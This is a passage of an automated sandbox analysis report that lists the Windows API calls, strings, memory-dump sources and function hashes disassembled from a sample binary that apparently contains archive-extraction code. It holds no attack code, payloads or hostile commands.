                                                                  • __fprintf_l.LIBCMT ref: 00CBD954
                                                                  • _strncpy.LIBCMT ref: 00CBD99A
                                                                    • Part of subcall function 00CC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CF1030,?,00CBD928,00000000,?,00000050,00CF1030), ref: 00CC1DC4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                  • String ID: $%s$@%s
                                                                  • API String ID: 562999700-834177443
                                                                  • Opcode ID: 0b3a9f1552776c60bf3539659b5625091ed99a6d083429548d3b4032ed96aebe
                                                                  • Instruction ID: 1c6580d65f699c213fc7fda1f891089cd763bd9102aba53d5205cd2fc5c19e2b
                                                                  • Opcode Fuzzy Hash: 0b3a9f1552776c60bf3539659b5625091ed99a6d083429548d3b4032ed96aebe
                                                                  • Instruction Fuzzy Hash: EC21757284034CAEDB21EEA5CC05FEE7BA8AF05704F040526FA1297192F671D748DB51
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CBAC5A,00000008,?,00000000,?,00CBD22D,?,00000000), ref: 00CC0E85
                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CBAC5A,00000008,?,00000000,?,00CBD22D,?,00000000), ref: 00CC0E8F
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CBAC5A,00000008,?,00000000,?,00CBD22D,?,00000000), ref: 00CC0E9F
                                                                  Strings
                                                                  • Thread pool initialization failed., xrefs: 00CC0EB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                  • String ID: Thread pool initialization failed.
                                                                  • API String ID: 3340455307-2182114853
                                                                  • Opcode ID: 1b6650dfed6366558027838d99d60dc6b867f321c50aeab8583c87d051c24aa9
                                                                  • Instruction ID: d2d7dd1155e3b0b8e04a6494423f7f5c7e9cef8e7fa15f03f77ead8a225f9e87
                                                                  • Opcode Fuzzy Hash: 1b6650dfed6366558027838d99d60dc6b867f321c50aeab8583c87d051c24aa9
                                                                  • Instruction Fuzzy Hash: 2E1151B1680748DFC3215F6ADC84BABFBECEB55744F24482EF1DAC7200D671AA408B54
                                                                  APIs
                                                                    • Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                    • Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  • EndDialog.USER32(?,00000001), ref: 00CCB2BE
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CCB2D6
                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CCB304
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: GETPASSWORD1
                                                                  • API String ID: 445417207-3292211884
                                                                  • Opcode ID: d3eb9c4cded70e81d243d4fc54bcf29d463c7b1a8492739ee4a9c54fe649bcf4
                                                                  • Instruction ID: 1088c479746020394c3cae99d0ba2bf53934770199f59e6b0523eed0b0d739f8
                                                                  • Opcode Fuzzy Hash: d3eb9c4cded70e81d243d4fc54bcf29d463c7b1a8492739ee4a9c54fe649bcf4
                                                                  • Instruction Fuzzy Hash: 5611C83294021576DB219EA5EC4AFFF376CEF19710F040029FA45F61D4CBA49E469771
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                  • API String ID: 0-56093855
                                                                  • Opcode ID: b0c6aef50fcb8a973878973449208e021061d59c7b2308fb25b7efe417d94563
                                                                  • Instruction ID: 30bbb28079a0eb4630ec93ec9ba80c60bef020f4473918370f590d3d30cd2307
                                                                  • Opcode Fuzzy Hash: b0c6aef50fcb8a973878973449208e021061d59c7b2308fb25b7efe417d94563
                                                                  • Instruction Fuzzy Hash: A7015A76A04285AFDB118FA5EC44FAA7FA8E708354B04483DF907C2270CA319955DBB1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: __alldvrm$_strrchr
                                                                  • String ID:
                                                                  • API String ID: 1036877536-0
                                                                  • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                  • Instruction ID: 210fc2f7b313d82e1fbc681c80875794c354a6847857362b2ad1223a99500354
                                                                  • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                  • Instruction Fuzzy Hash: B2A16B7A9143869FEB21CF58C8817AEFBE5EF91310F24416FE6959B381C2348E41C750
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CB7F69,?,?,?), ref: 00CBA3FA
                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CB7F69,?), ref: 00CBA43E
                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CB7F69,?,?,?,?,?,?,?), ref: 00CBA4BF
                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,00CB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CBA4C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File$Create$CloseHandleTime
                                                                  • String ID:
                                                                  • API String ID: 2287278272-0
                                                                  • Opcode ID: b9334a9b82ba0d9267ec64c68c36577a627899fdcf7f66e70284f7eecc294cf1
                                                                  • Instruction ID: a4c40b945809a685738c4e36214dd4ede629a34b135c1456ad397c70441fd23b
                                                                  • Opcode Fuzzy Hash: b9334a9b82ba0d9267ec64c68c36577a627899fdcf7f66e70284f7eecc294cf1
                                                                  • Instruction Fuzzy Hash: B641C131248381AAE731DF24DC49FEEBBE49B85300F08491DF5E597191D6A4DB48DB53
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID:
                                                                  • API String ID: 176396367-0
                                                                  • Opcode ID: 33bcd45105f461caa77fe874dc889bf27e62160b9ac29fd45071c9a795d9ba31
                                                                  • Instruction ID: 593f8c8e2aee341b68b51b82b2fcd8ece958b5af2b129137c88f8ad04604eff1
                                                                  • Opcode Fuzzy Hash: 33bcd45105f461caa77fe874dc889bf27e62160b9ac29fd45071c9a795d9ba31
                                                                  • Instruction Fuzzy Hash: 8241B6719006699BCB259F68CC1AAEF7BB8EF05310F04401EFE45F7241DF30AE458AA5
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00CD47C6,00000000,00000000,00CD57FB,?,00CD57FB,?,00000001,00CD47C6,2DE85006,00000001,00CD57FB,00CD57FB), ref: 00CDC9D5
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CDCA5E
                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CDCA70
                                                                  • __freea.LIBCMT ref: 00CDCA79
                                                                    • Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                  • String ID:
                                                                  • API String ID: 2652629310-0
                                                                  • Opcode ID: 3bd44c41252da19e8e797bd01a2bfa72733eda8a197335749b970900e21b4452
                                                                  • Instruction ID: 46fca93902e82c21c54db4c31b96d228de06b80ab6e3c9a17999c920656bbbb2
                                                                  • Opcode Fuzzy Hash: 3bd44c41252da19e8e797bd01a2bfa72733eda8a197335749b970900e21b4452
                                                                  • Instruction Fuzzy Hash: 8231D33290021AABDF24DF64CC85EBE7BA5EB01310B044269FD18DB290E735DE51EB90
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 00CCA666
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CCA675
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CCA683
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00CCA691
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 7bb6acfbe7fb6e0775452a8a892adc73813997161e936ea7a1cf54d6eb88fe1c
                                                                  • Instruction ID: 9c764a577e11dacb2bd2cb4cc9237b1492baf6f653c72e36385af62c75dcb7b7
                                                                  • Opcode Fuzzy Hash: 7bb6acfbe7fb6e0775452a8a892adc73813997161e936ea7a1cf54d6eb88fe1c
                                                                  • Instruction Fuzzy Hash: D1E0EC31942721B7D6615F60BC1DBDA3E98AB09B52F018501FB05E6290DF7486058BB1
                                                                  APIs
                                                                    • Part of subcall function 00CCA699: GetDC.USER32(00000000), ref: 00CCA69D
                                                                    • Part of subcall function 00CCA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CCA6A8
                                                                    • Part of subcall function 00CCA699: ReleaseDC.USER32(00000000,00000000), ref: 00CCA6B3
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00CCA83C
                                                                    • Part of subcall function 00CCAAC9: GetDC.USER32(00000000), ref: 00CCAAD2
                                                                    • Part of subcall function 00CCAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CCAB01
                                                                    • Part of subcall function 00CCAAC9: ReleaseDC.USER32(00000000,?), ref: 00CCAB99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectRelease$CapsDevice
                                                                  • String ID: (
                                                                  • API String ID: 1061551593-3887548279
                                                                  • Opcode ID: dde2c4d824893a1ae86dded807273fff6bf52ff8e705060d9840867ee6775a3f
                                                                  • Instruction ID: c29b866cc823371482ba636a2dacaeb52dfab7f8912031f258b99374be384591
                                                                  • Opcode Fuzzy Hash: dde2c4d824893a1ae86dded807273fff6bf52ff8e705060d9840867ee6775a3f
                                                                  • Instruction Fuzzy Hash: C491D171604394AFD610DF25C888E6BBBE8FF89704F00491EF59AD7261DB31A946CF62
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00CDB324
                                                                    • Part of subcall function 00CD9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CD9086,00000000,00CD8D94,00000000,00000000,00000000,00000016,?,?,00CD9093,00000000,00000000,00000000,00000000,00000000), ref: 00CD9099
                                                                    • Part of subcall function 00CD9097: GetCurrentProcess.KERNEL32(C0000417,00CD8D94,00000000,?,00000003,00CD9868), ref: 00CD90BB
                                                                    • Part of subcall function 00CD9097: TerminateProcess.KERNEL32(00000000,?,00000003,00CD9868), ref: 00CD90C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                  • String ID: *?$.
                                                                  • API String ID: 2667617558-3972193922
                                                                  • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                  • Instruction ID: f6ab87ca451fc319023f6e50adfbd6744089b1580e6951f689201e4dc6cf2688
                                                                  • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                  • Instruction Fuzzy Hash: 0D519376E0010AEFDF14DFA8C881AADB7B5FF58310F25416AEA54E7350EB359E019B50
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB75E3
                                                                    • Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0
                                                                    • Part of subcall function 00CBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CBA598
                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB777F
                                                                    • Part of subcall function 00CBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA501
                                                                    • Part of subcall function 00CBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                  • String ID: :
                                                                  • API String ID: 3226429890-336475711
                                                                  • Opcode ID: 91ed0cd44f6507ca19027ea75d44b2efb68f8e9b489cd030c0666d3a564edb0f
                                                                  • Instruction ID: 4f932d75fba4ff3ae897969e8d24258bf20e159067cf435ee1ee8261862dc8c7
                                                                  • Opcode Fuzzy Hash: 91ed0cd44f6507ca19027ea75d44b2efb68f8e9b489cd030c0666d3a564edb0f
                                                                  • Instruction Fuzzy Hash: B84152B1801158AAEB35EB64CD55EEEB37CEF85300F0041D6BA09A7092DB745F89DF61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: }
                                                                  • API String ID: 176396367-4239843852
                                                                  • Opcode ID: 8862d2b2faa522dc360b9f7908cad52d90604d3c666e4e8ac6902477aaf39388
                                                                  • Instruction ID: 011dd314cadcbcda5710491bfbb4e6d002b3a7c3274f6d205b4ff7462fdf1b45
                                                                  • Opcode Fuzzy Hash: 8862d2b2faa522dc360b9f7908cad52d90604d3c666e4e8ac6902477aaf39388
                                                                  • Instruction Fuzzy Hash: 5321C07290474A5AD731EAA4D846F6BB3ECDF91750F14042EF640C3242EB65EE4893A3
                                                                  APIs
                                                                    • Part of subcall function 00CBF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CBF2E4
                                                                    • Part of subcall function 00CBF2C5: GetProcAddress.KERNEL32(00CF81C8,CryptUnprotectMemory), ref: 00CBF2F4
                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,00CBF33E), ref: 00CBF3D2
                                                                  Strings
                                                                  • CryptProtectMemory failed, xrefs: 00CBF389
                                                                  • CryptUnprotectMemory failed, xrefs: 00CBF3CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CurrentProcess
                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                  • API String ID: 2190909847-396321323
                                                                  • Opcode ID: eaea6d55440621c69ec96f7c31ada30e620f7112ab0a3a0f6612fa56f9b1afe0
                                                                  • Instruction ID: 6bbc2ab15288dc369947558717607c7ca8e29920f3ed042697b8ba4d8b307ae5
                                                                  • Opcode Fuzzy Hash: eaea6d55440621c69ec96f7c31ada30e620f7112ab0a3a0f6612fa56f9b1afe0
                                                                  • Instruction Fuzzy Hash: 2B11D3316002A9ABEF159B21DC49BBE3B94FF00760F04812AFC515B361DA74AE429691
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 00CBB9B8
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: __vswprintf_c_l_swprintf
                                                                  • String ID: %c:\
                                                                  • API String ID: 1543624204-3142399695
